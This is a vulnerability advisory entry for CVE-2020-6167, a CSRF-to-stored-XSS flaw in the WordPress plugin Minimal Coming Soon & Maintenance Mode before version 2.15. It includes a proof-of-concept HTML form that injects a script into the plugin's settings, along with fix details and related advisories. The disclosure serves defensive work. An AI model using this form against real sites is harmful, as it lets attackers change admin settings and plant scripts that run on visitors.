Minimal Coming Soon & Maintenance Mode < 2.15 – CSRF to Stored XSS and Setting Changes | CVE 2020-6167 | Plugin Vulnerabilities

Description

This plugin had no nonce checks on any of the settings to verify that a request came from a legitimate source, such as a logged in administrative user. Therefore, creating a CSRF to stored XSS in addition to significant setting changes.

Proof of Concept

<html>
  <body>
    <form action="URL/wp-admin/options-general.php?page=maintenance_mode_options" method="POST">
      <input type="hidden" name="signals_csmm_showlogged" value="1" />
      <input type="hidden" name="signals_csmm_html" value="<script>alert(1)</script>" />
      <input type="hidden" name="signals_csmm_css" value="" />
      <input type="hidden" name="signals_csmm_submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

minimal-coming-soon-maintenance-mode

Fixed in 2.15

References

CVE

URL

https://www.wordfence.com/blog/2020/01/multiple-vulnerabilities-patched-in-minimal-coming-soon-maintenance-mode-coming-soon-page-plugin/

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website

https://wordfence.com

Submitter twitter

Verified

No

WPVDB ID

efe55078-753c-4333-941e-9c33f1a85a41

Timeline

Publicly Published

2020-01-08 (about 6 years ago)

Added

2020-01-08 (about 6 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2025-01-16

Title

ECT Add to Cart Button <= 1.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-09-22

Title

Sweet Energy Efficiency < 1.0.9 - Cross-Site Request Forgery

Published

2025-12-15

Title

Simple Folio < 1.1.1 - Cross-Site Request Forgery

Published

2023-03-21

Title

Weather Station < 3.8.13 - Mode Switch via CSRF

Published

2014-08-01

Title

uk-cookie - Cross-Site Request Forgery (CSRF)